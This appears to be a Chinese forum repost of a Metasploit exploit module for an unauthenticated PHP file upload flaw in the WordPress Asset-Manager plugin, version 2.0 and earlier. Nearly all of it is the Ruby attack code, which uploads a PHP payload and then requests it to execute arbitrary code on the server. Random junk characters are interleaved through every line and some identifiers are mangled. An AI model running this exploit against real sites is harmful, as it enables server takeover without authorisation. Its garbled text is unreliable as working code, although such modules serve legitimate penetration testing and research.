这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。
* `1 W/ b- y: \# p3 {
+ c' _, X5 Q; o3 a##
& j2 n& H: R0 W0 W+ P9 n0 x# This file is part of the Metasploit Framework and may be subject to: ^2 T. G( S. K
# redistribution and commercial restrictions. Please see the Metasploit6 V e: v( ~( Y5 o
# Framework web site for more information on licensing and terms of use.4 j, P2 i c |$ S% q
# http://metasploit.com/framework/
1 E C, g9 G% }5 P! H: Y##
/ o. W; P- m4 y* V+ u 4 S! u( z2 v5 A3 D; O
require 'msf/core'
& m9 i' i/ u4 x W5 m4 | Nrequire 'msf/core/exploit/php_exe'0 \$ Q# M5 C9 J/ Z
% e4 p9 n8 @7 z, m8 ~$ o( i3 I+ T
class Metasploit3 < Msf::Exploit::Remote0 U8 V* P- q- E' m H/ [& Q7 Z
Rank = ExcellentRanking
4 S4 F% D g& E, u, g0 Z
9 R: {3 F7 Y0 \' M3 _, P include Msf::Exploit::Remote::HttpClient5 F# H' f d% c- H
include Msf::Exploit: hpEXE+ l9 t5 D. J$ y) r7 W/ n- S
3 R. p3 Q8 n' c) B' f def initialize(info = {})& F1 u8 l) K7 ?# Y% Y3 V5 o/ N
super(update_info(info,3 b/ Q& j4 Q3 M4 A, ]
'Name' => 'WordPress Asset-Manager PHP File Upload Vulnerability',
5 `- t$ t4 O6 N! I! e 'Description' => %q{
& A# j+ L4 t' G. Y3 v" J7 X This module exploits a vulnerability found in Asset-Manager <= 2.0 WordPress/ B' d# T5 o, v' A' ?. k
plugin. By abusing the upload.php file, a malicious user can upload a file to a
* [) ]% j8 D, j* L! k temp directory without authentication, which results in arbitrary code execution.
+ ?* F, A6 A. o7 g8 Z+ o },
3 s& i7 P( m9 z3 Y 'Author' =>
7 p0 k6 `7 {; V9 L: U [
: M( Q0 Y% N$ I( g) B$ O' h 'Sammy FORGIT', # initial discovery
& k. d3 u& ]& @ 'James Fitts <fitts.james[at]gmail.com>' # metasploit module
1 X( |1 P! M- s: V% v$ |8 J ],
! U' ]1 }0 X: e; Z8 ?. k% c2 s 'License' => MSF_LICENSE,
0 x& s. B# o& [% @ `# \ 'References' =>; S- Q4 B$ N2 x+ f
[$ }% R+ S+ W' g+ l* C* X _
[ 'OSVDB', '82653' ],( V9 x9 d2 f! r0 T" M
[ 'BID', '53809' ],
* d9 w- t. u" P* p1 Q5 |" j: f [ 'EDB', '18993' ],
( a- [+ z- ` m- o [ 'URL', 'http:// www.myhack58.com /' ]
, j" X5 f/ I. R; N ],
) ?$ ] |) h$ Z ^9 e 'Payload' =>+ y8 K+ x% f! m% P* |5 y/ ]
{, p+ u& E2 J" i
'BadChars' => "\x00",
* E m/ |. t6 p5 F },7 R: u2 j7 s2 d' `
'Platform' => 'php',
i% ^% j& e6 R' O7 E' i 'Arch' => ARCH_PHP,
" B H2 E% z. p. P 'Targets' =>
3 h# o, X* V: W+ Z0 W [0 `: c. q v+ Z* D6 z" Z2 T
[ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
1 H0 E1 E& g$ d; V) s h6 Z [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]' `; J- n% Z/ _+ }9 g
],2 m+ w: x( K1 i1 n% A
'DefaultTarget' => 0,
9 G& z$ B* X/ j/ d; V3 p 'DisclosureDate' => 'May 26 2012'))
" _5 L0 _9 D. v5 ~2 | % h- ~# A9 [+ {
register_options(
1 Z: S: w$ ~# ] o2 p1 s' ^4 S" r [& y; h5 A4 J% V2 {
OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])$ n' ?8 k1 M+ f6 i8 N
], self.class)) J3 W" e( r, p- I6 ]
end
6 Z) R3 _' E) C: f 0 q) V+ @7 P( ]4 }3 n; e
def exploit3 X1 e$ p. ^7 E' `% o5 w' ]
uri = target_uri.path
. \/ I+ B/ E" W% {3 V2 B uri << '/' if uri[-1,1] != '/'
+ K5 v, o4 t4 v5 u5 j4 v. i peer = "#{rhost}:#{rport}"
# Z0 }# o# d5 C3 W2 o" ^0 Z, l: i4 p payload_name = "#{rand_text_alpha(5)}.php") _; {6 Y0 l3 ^6 f
php_payload = get_write_exec_payload(:unlink_self=>true)
q, T5 S4 U5 O5 |* V $ v, @; L+ `- o3 v* L3 Y. @% B
data = Rex::MIME::Message.new! z5 e# Q ~6 X" w. U2 M2 j; a
data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")8 P) ]4 ^, U8 C3 Q: x8 V0 m
post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')1 C; z6 L! {9 u
: T. K6 ~( ? L% U( k print_status("#{peer} - Uploading payload #{payload_name}"). m" P; z2 {4 _
res = send_request_cgi({
& m' y, e7 x7 d1 X* b f3 _' E- T 'method' => 'POST',
& n& P% i/ _8 |1 }# }0 g W2 C 'uri' => "#{uri}wp-content/plugins/asset-manager/upload.php",; U, M0 K$ E# u. W6 @2 D
'ctype' => "multipart/form-data; boundary=#{data.bound}",
; ?" A5 D4 h: Z 'data' => post_data, A0 r6 `: }- ^
}) O9 F( p" t. m' w# r
( e8 ` ]/ I( w' L3 E% X$ @4 f
if not res or res.code != 200 or res.body !~ /#{payload_name}/+ i: j2 i! ?) N1 s
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
0 [3 M6 L) b( D" }( N6 ~end
9 f5 S. x7 g% O% C0 S- M 0 N8 n7 F- @0 \$ F, q
print_status("#{peer} - Executing payload #{payload_name}")% @1 A% X9 E1 ~- r
res = send_request_raw({
; b' M4 ]' S- P! K# s P: m 'uri' => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
; \+ V" q j c. g+ b8 e! O v6 c 'method' => 'GET'* S6 q6 L8 N7 l1 r+ |. I* y
})- ]$ L8 A1 ]* f, y& W
$ O' Z4 B7 Y3 W q
if res and res.code != 200- Q' q+ `& R4 {$ }
fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
; _. i, ~# q( K! L4 h+ @4 n- E/ a end
, Z7 J- }% M+ o- A+ T end
: F4 j6 n d" ?7 L1 d' ]end
$ h- I$ {+ j$ Y7 {9 s |